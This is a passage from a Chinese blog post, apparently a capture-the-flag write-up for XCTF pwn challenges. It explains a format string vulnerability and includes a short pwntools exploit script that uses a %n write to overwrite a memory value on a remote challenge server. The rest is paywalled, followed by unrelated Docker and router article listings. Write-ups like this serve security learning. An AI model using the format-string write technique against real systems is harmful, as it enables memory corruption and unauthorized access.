攻防世界 pwn进阶区解法 write up(一)

最新推荐文章于 2025-04-02 07:51:43 发布
最新推荐文章于 2025-04-02 07:51:43 发布
阅读量448 收藏
点赞数
分类专栏: 二进制漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_46441427/article/details/114259075
版权

实时数据监测

找信息

在这里插入图片描述
没有发现canary,没有开启PIE和NX
查看ida
在这里插入图片描述

在这里插入图片描述
在这里插入图片描述

发现有一个printf,这里是fgets,可能会用到格式化字符串漏洞,运行一下程序
在这里插入图片描述
结合ida的分析我们可知,要把这个值改成0x2223322,那结合之前的printf,可以确定是格式化字符串漏洞
给了我们地址,那我们的payload就以地址为开头,因为是p32,所以后面35795746要减4,构成%35795742d%偏移量n$
然后确定偏移量:
在这里插入图片描述
总共,从A到41包括A有12个,偏移量=12
所以得到payload

##!/usr/bin/env python
from pwn import * 
p = remote("111.200.241.244",44022)
payload = p32(0x0804A048) + '%35795742d%12$n'
p.sendline(payload)
p.interactive()

这里跑的时间很久,也一直不停地跳
在这里插入图片描述

dice_game

在这里插入图片描述
没有canary、NX、PIE,打开ida来1进行分析

分析

_int64 __fastcall main(
最低0.47元/天 解锁文章
中秋征文 | 【云原生之Docker】使用docker部署内网穿透工具FRP
jks212454的博客
08-30 2016
中秋征文 | 【云原生之Docker】使用docker部署内网穿透工具FRP
酷软正在连接服务器,蜗牛星际:我的B款双网口机箱PVE++LEDE 双软路由 保姆级教程...
weixin_35513425的博客
08-01 3061
原文作者阿文菌说明文章过长,需要看完整版的请点击原文链接:https://www.hao4k.cn/thread-34885-1-1.html文章过长,今日头条版本按两章发布,需要看第一张的请到我的文章内找到:教你蜗牛星际B款安装PVE//LEDE双软路由保姆级教程看第一章三、安装lede软路由LEDE的安装我本来是参考B站up主的方式来操作的,包括截图和软件准备,都是准备那套流程,但是没想到...
iKuai路由系统上添加docker功能!操作很简单
小白电脑技术的博客
01-10 6492
路由的docker功能其实也足够了,毕竟玩得转,什么都好。
Dockerdocker搭建frps,轻松实现公网访问群晖
weixiao20210727的博客
02-23 3151
上使用docker,搭建frps内网穿透,实现内网穿透
路由器docker配置使用frpc客户端教程
最新发布
2303_77123494的博客
04-02 1129
六、打开理由官网-----高级应用-----插件管理----docker(如果没有此插件,需去云绑定下载插件)十、点击进入docker----镜像管理----添加----将复制第9步的路径粘贴到镜像路径,点击确认。十二、查看是否通----进入网站----线路管理----操作台----隧道列表----显示绿色即通。四、线路大厅及创建隧道(注:TCP、udp、http、https)正常tcp隧道)七、点击进入docker----镜像管理----添加----点击文件管理。10、点击挂载目录----添加。
最新版3.6用docker安装Jellyfin最新教程
upup
11-16 2676
最新版3.6用docker安装Jellyfin最新教程
docker手动上传镜像更新
weixin_46799707的博客
09-23 57万+
镜像。
路由部署docker容器插件镜像连不上解决办法
weixin_46701199的博客
02-13 1566
路由docker容器镜像问题解决
iKuai上的docker功能部署小米HomeAssistant教程!一帖到底
小白电脑技术的博客
01-01 4898
前几天咱们讲到如何在iKuai路由系统上启用Docker功能,相信有很多小伙伴都看了!内容看似很多,其实一点也不少。因为步骤详细到点击某个按钮,所以看起来内容超难,部署起来其实一点都不简单。这几天小白思考了一下,为什么这个帐号一定叫小白电脑技术呢?大概是因为小白其实也是小白吧,只不过比较舍得花时间折腾。前段时间小米xiaomi开源了Home Assistant的新闻爆火,小白自己也体验了一把!也在NAS、Linux上部署过,不过这次的首发还是给到了咱们的软路由系统——iKuai!
饭团云监工Docker插件安装方法(支持监工同步,拉下行)
神奇的饭团的博客
12-12 3890
饭团云监工插件,Linux,Windows插件安装教程。插件支持:拉下行,监工数据同步,95带宽统计
上行流量太高,增加宽带下行流量【docker安装教程】
热门推荐
weixin_46799707的博客
04-16 62万+
上行流量太高,让我们来平衡一下吧。只支持64位系统。
Kubernetes集群搭建之软路由的安装
10-29 1153
Kubernetes集群搭建之软路由的安装一:新建虚拟机二:安装过程三:后台的配置 一:新建虚拟机 软件使用VMware-Workstation-15,系统选择win10X64,固件类型选择BIOS,如下图 网络类型选择仅主机模式(共享网卡上网) 虚拟磁盘选择IDE,选择其他的会报错 二:安装过程 编辑虚拟机设置,CD/DVD选择老毛桃PE并开启此虚拟机 开机选择第一项 待进入桌面后,将CD/DVD换为封装了koolshare软路由的镜像,点击确定后,打开此电脑(无需重启) 打开我的电脑,继续打
docker容器拉下行
qq1172851433的博客
01-25 9202
链接:https://pan.baidu.com/s/1Qun2wPPJZ_VGSeRg2BeIig?1.高级应用-插件管理-进入docker-添加docker-镜像管理-添加。4.高级应用-插件管理-进入docker-添加docker。3.选择磁盘:默认;地址:自定义 *不可与iKuai内已有网段冲突*地址:自定义 *不可与iKuai内已有网段冲突*地址:自定义 *不可与iKuai内已有网段冲突*变量名:url 变量值:(以下链接任选其一)变量名:th 变量值:2。周期,时间段:自定义。
使用 IKuai 和 DDNSTO 外网访问你的设备(NAS、软路由)
qq_37631786的博客
04-09 2万+
前言: 虽然咱们国家已经有了 IPv6 普及的政策,按理来说普及后的 IPv6 的地址更多,电信运营商也更愿意为用户下放 IPv6 的公网浮动 IP。但奈何有些地方的运营商对 IPv6 的公网 IP 像抱着宝一样不肯撒手,逼着用户做内网穿透也是属实恶心人。对比市面上的内网穿透的服务价格来看,DDNSTO还是很有性价比的。(非广告,DDNSTO看到了请打钱) 正好我的我也得知 IKuai 也可以折腾 Docker 了,不免的手痒痒,想把自己的软路由做上一个DDNS,方便外网管理和后期的折腾。 那么将 D
树莓派玩转openwrt软路由:8.OpenWrt安装Docker环境
qq_42523645的博客
10-12 8758
树莓派OpenWrt安装Docker环境
Centos 安装 docker
gzt19881123的专栏
07-31 604
官网地址: https://docs.docker.com/install/linux/docker-ce/centos/ 这里选择Community (社区)版本 1. 删除自带的docker环境 $ sudo yum remove docker docker-client docker-client-latest docker-common docker-latest docker-...
docker安装迅雷
m0_71283887的博客
04-06 4649
众所周知,docker因为权限问题,导致很多docker无法使用,因为的虚拟机会消耗掉很多性能,很多人都想在docker安装很多插件,这样就就可以节约大部分性能,不用再去做all in one,一个搞定。
docker安装青龙教程
upup
11-19 4192
在磁盘根目录下新建qinlong文件夹,下面再分别建db,log,config,scripts。浏览器输入192.168.12.1:5700即可进入配置,然后就可以正常使用了。首先高级应用-插件管理-镜像管理-添加。搜索qinglong如下。选择第一个latest。分别挂载以上目录,保存。
【软路由安装(PVE+ikuai)】
JH的博客
11-07 1万+
软路由安装(PVE+ikuai)
docker安装docker并且安装插件
08-11
安装Docker安装插件,可以按照以下步骤进行操作: 1. 首先,安装Docker。可以按照官方文档提供的步骤进行安装,或者使用适合您操作系统的包管理器进行安装。 2. 安装Docker Compose插件。可以使用以下方法安装: 2.1 下载指定版本的docker-compose文件: curl -L https://github.com/docker/compose/releases/download/1.21.2/docker-compose-`uname -s`-`uname -m` -o /usr/local/bin/docker-compose 2.2 赋予docker-compose文件执行权限: chmod +x /usr/local/bin/docker-compose 2.3 验证安装是否成功: docker-compose --version 3. 在安装插件之前,可以测试端口是否已被占用,以避免编排过程中出错。可以使用以下命令安装netstat并查看端口号是否被占用: yum -y install net-tools netstat -npl | grep 3306 现在,您已经安装Docker安装Docker Compose插件,可以继续进行其他操作,例如上传docker-compose.yml文件到服务器,并在服务器上安装MySQL容器。可以参考Docker的官方文档或其他资源来了解如何使用DockerDocker Compose进行容器的安装和配置。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *2* [Docker安装docker-compose插件](https://blog.youkuaiyun.com/qq_50661854/article/details/124453329)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] - *3* [Docker安装MySQL docker安装mysql 完整详细教程](https://blog.youkuaiyun.com/qq_40739917/article/details/130891879)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值